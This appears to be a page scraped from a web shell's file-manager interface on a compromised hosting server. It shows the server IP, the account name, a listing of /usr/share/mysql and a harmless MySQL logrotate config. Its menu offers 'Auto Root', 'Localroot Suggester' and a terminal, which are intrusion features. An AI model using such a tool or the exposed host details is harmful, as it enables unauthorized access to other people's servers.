Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.29
Domains :
Cant Read [ /etc/named.conf ]
User : celfico1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
mysql /
Delete
Unzip
Name
Size
Permission
Date
Action
bulgarian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
charsets
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
czech
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
danish
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
dutch
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
english
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
estonian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
french
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
german
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
greek
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
hungarian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
italian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
japanese
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
korean
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
norwegian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
norwegian-ny
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
polish
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
portuguese
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
romanian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
russian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
serbian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
slovak
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
spanish
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
swedish
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
ukrainian
[ DIR ]
drwxr-xr-x
2023-10-24 18:18
dictionary.txt
24.98
KB
-rw-r--r--
2023-10-11 11:42
errmsg-utf8.txt
518.77
KB
-rw-r--r--
2023-10-11 11:42
fill_help_tables.sql
1.03
MB
-rw-r--r--
2023-10-11 11:50
innodb_memcached_config.sql
3.91
KB
-rw-r--r--
2023-10-11 11:42
install_rewriter.sql
2.17
KB
-rw-r--r--
2023-10-11 12:09
magic
773
B
-rw-r--r--
2023-10-11 11:42
mysql-log-rotate
844
B
-rw-r--r--
2023-10-11 12:09
mysql_security_commands.sql
2.12
KB
-rw-r--r--
2023-10-11 11:42
mysql_sys_schema.sql
281.58
KB
-rw-r--r--
2023-10-11 11:42
mysql_system_tables.sql
151.8
KB
-rw-r--r--
2023-10-11 11:42
mysql_system_tables_data.sql
1.19
KB
-rw-r--r--
2023-10-11 11:42
mysql_test_data_timezone.sql
10.61
KB
-rw-r--r--
2023-10-11 11:42
uninstall_rewriter.sql
1.21
KB
-rw-r--r--
2023-10-11 12:09
Save
Rename
# The log file name and location can be set in # /etc/my.cnf by setting the "log-error" option # in either [mysqld] or [mysqld_safe] section as # follows: # # [mysqld] # log-error=/var/lib/mysql/mysqld.log # # In case the root user has a password, then you # have to create a /root/.my.cnf configuration file # with the following content: # # [mysqladmin] # password = <secret> # user= root # # where "<secret>" is the password. # # ATTENTION: The /root/.my.cnf file should be readable # _ONLY_ by root ! /var/lib/mysql/mysqld.log { # create 600 mysql mysql notifempty daily rotate 5 missingok compress postrotate # just if mysqld is really running if test -x /usr/bin/mysqladmin && \ /usr/bin/mysqladmin ping &>/dev/null then /usr/bin/mysqladmin flush-logs fi endscript }